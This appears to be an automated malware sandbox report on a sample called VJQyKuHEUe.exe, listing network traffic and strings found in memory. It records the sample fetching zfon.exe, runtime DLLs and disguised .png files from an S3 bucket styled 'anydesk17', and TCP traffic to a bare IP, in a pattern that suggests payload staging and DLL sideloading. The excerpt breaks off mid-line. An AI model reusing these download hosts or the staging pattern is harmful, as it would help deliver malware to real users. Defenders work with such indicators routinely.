Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F3B00 recv,7_2_000001CDCB8F3B00
Source: global trafficHTTP traffic detected: GET /zfon.exe HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /view.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /aut.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /libcef.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.comd
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669095674.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673608765.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3869237698.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681020185.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2660154040.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669522029.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2705880886.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: VJQyKuHEUe.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 0000000B.00000002.2581630998.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2551388655.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2705880886.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2686333787.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669095674.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681020185.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673608765.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681446324.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3867700220.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3871930206.000000000485B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3871870642.000000000484F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669522029.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2660154040.0000000004849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669095674.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673608765.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3869237698.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681020185.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2660154040.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669522029.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2705880886.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669095674.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673608765.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3869237698.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681020185.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2660154040.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669522029.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2705880886.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: VJQyKuHEUe.exeString found in binary or memory: http://ocsp.digicert.com0
Source: VJQyKuHEUe.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: VJQyKuHEUe.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: VJQyKuHEUe.exeString found in binary or memory: http://ocsp.digicert.com0N
Source: VJQyKuHEUe.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: VJQyKuHEUe.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://s.symcd.com06
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.comd
Source: explorer.exe, 0000000B.00000000.2556832450.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2556911362.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.2587251608.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VJQyKuHEUe.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: VJQyKuHEUe.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: VJQyKuHEUe.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: VJQyKuHEUe.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000003.2749284190.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000B.00000002.2597298593.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000B.00000000.2553828308.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2585817290.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2749284190.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C068000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002970000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngd
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngd
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe
Source: explorer.exe, 0000000B.00000002.2589830986.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3867808677.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000E.00000003.2658620347.0000000008E15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000B.00000000.2552524018.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2583918410.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
Source: VJQyKuHEUe.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: VJQyKuHEUe.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: VJQyKuHEUe.exeString found in binary or memory: https://d.symcb.com/rpa0.
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://nydus.battle.net/App/
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://nydus.battle.net/Bnet/client/purchase/jsutil
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 